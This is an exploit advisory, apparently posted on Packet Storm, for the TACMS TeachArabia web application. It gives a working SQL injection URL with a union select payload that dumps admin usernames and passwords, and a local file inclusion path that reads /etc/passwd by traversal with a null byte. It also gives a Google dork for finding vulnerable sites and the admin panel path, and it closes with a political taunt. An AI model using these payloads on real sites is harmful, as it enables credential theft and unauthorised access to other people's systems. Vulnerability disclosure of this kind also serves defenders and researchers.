TACMS TeachArabia suffers from remote SQL injection and local file inclusion vulnerabilities.
5107f27d97c4401ba6b7860bbfaa038e3abcd0a398d5646b2da36f50924103cf
################################################################################################
# Exploit Title: TACMS - TeachArabia Multiple Vulnerabilities
#
# Author : CoBRa_21
#
# Thanks : e-banka.org & cyber-warrior.org
#
# E-Mail : uyku_cu [at] windowslive.com
#
# Google Dork : Powered by TeachArabia
#
# Script Page : http://www.teacharabia.com/
################################################################################################
#
# SQL Exploit
#
# http://127.0.0.1/[PATH]/index.php?p_name=events_item_view&id=17' SQL
#
# SQL = union select 1,2,3,4,5,6,7,8,9,group_concat(username,0x3a,password),11 from admins
#
# LFI Exploit
#
# http://127.0.0.1/[PATH]/?lang=../../../../../../../../../../../../../../../etc/passwd%00.png&p_id=60
#
# Administartor Panel
#
# http://127.0.0.1/[PATH]/taadmin
#
################################################################################################
Bashar al-Assad Yanacaksýn Sende Kaddafi Gibi ;)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed